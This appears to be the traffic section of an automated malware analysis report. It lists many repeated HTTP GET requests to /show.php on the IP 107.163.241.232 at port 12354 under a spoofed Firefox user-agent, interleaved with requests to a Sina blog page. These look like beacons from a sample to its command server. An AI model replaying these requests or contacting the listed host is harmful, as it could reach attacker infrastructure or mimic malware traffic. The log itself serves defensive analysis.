Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
